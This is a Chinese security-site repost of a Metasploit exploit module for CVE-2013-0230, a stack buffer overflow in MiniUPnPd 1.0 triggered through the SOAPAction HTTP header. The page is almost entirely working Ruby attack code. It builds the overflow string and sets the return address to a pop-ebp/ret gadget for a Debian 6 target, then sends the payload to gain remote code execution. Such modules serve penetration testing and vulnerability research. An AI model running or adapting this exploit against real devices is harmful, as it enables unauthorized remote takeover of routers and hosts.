首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution
来源:metasploit.com 作者:Lukan 发布时间:2013-06-06  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient
  Rank = NormalRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
      'Description'    => %q{
          This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
        present in the SOAPAction HTTP header handling.
      },
      'Author'         =>
        [
          'hdm', # Vulnerability discovery
          'Dejan Lukan' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'DefaultOptions' => { 'EXITFUNC' => 'process', },
      # the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
      # input, which is why it can't be part of the shellcode (otherwise the vulnerable part
      # of the program is never reached)
      'Payload'        =>
        {
          'Space' => 2060,
          'BadChars' => "\x00\x22",
          'DisableNops' => true
        },
      'Platform'       => 'linux',
      'References'     =>
        [
          [ 'CVE', '2013-0230' ],
          [ 'OSVDB', '89624' ],
          [ 'BID', '57608' ],
          [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play']
        ],
      'Targets'        =>
        [
          [ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0',
            {
              'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd
              'Offset' => 2123
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 27 2013',
    ))

    register_options([
      Opt::RPORT(5555),
    ], self.class)
  end

  def exploit
    #
    # Build the SOAP Exploit
    #
    # jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char)
    sploit  = "\xeb\x2d"

    # a valid action
    sploit += "n:schemas-upnp-org:service:WANIPConnection:1#"

    # payload
    sploit += payload.encoded

    # nops
    sploit += rand_text(target['Offset'] - sploit.length - 16)

    # overwrite registers on stack: the values are not used, so we can overwrite them with anything
    sploit += rand_text(4)     # overwrite EBX
    sploit += rand_text(4)     # overwrite ESI
    sploit += rand_text(4)     # overwrite EDI
    sploit += rand_text(4)     # overwrite EBP

    # Overwrite EIP with addresss of "pop ebp, ret", because the second value on the
    # stack points directly to the string after 'Soapaction: ', which is why we must
    # throw the first value on the stack away, which we're doing with the pop ebp
    # instruction. Then we're returning to the next value on the stack, which is
    # exactly the address that we want.
    sploit += [target.ret].pack('V')

    # the ending " character is necessary for the vulnerability to be reached
    sploit += "\""

    # data sent in the POST body
    data =
      "<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
      "<SOAP-ENV:Envelope\r\n" +
      "  SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
      "  xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
      "  xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
      ">\r\n" +
      "<SOAP-ENV:Body>\r\n" +
      "<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
      "</ns1:action>\r\n" +
      "</SOAP-ENV:Body>\r\n" +
      "</SOAP-ENV:Envelope>\r\n"

    #
    # Build and send the HTTP request
    #
    print_status("Sending exploit to victim #{target.name} at ...")
    send_request_cgi({
      'method'  => 'POST',
      'uri'     => "/",
      'headers' => {
        'SOAPAction' => sploit,
      },
      'data'    => data,
    })

    # disconnect from the server
    disconnect
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mac OSX Server DirectoryServic
·Plesk Apache Zeroday Remote Ex
·Exim sender_address Parameter
·Novell Zenworks Mobile Device
·PEStudio 3.69 - Denial of Serv
·Imperva SecureSphere Operation
·Microsoft Internet Explorer te
·DS3 Authentication Server Comm
·Quick TFTP Server 2.2 - Denial
·Seowonintech Routers Remote Ro
·Windows内核EPATHOBJ 0day explo
·KNet Web Server 1.04b Denial O
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved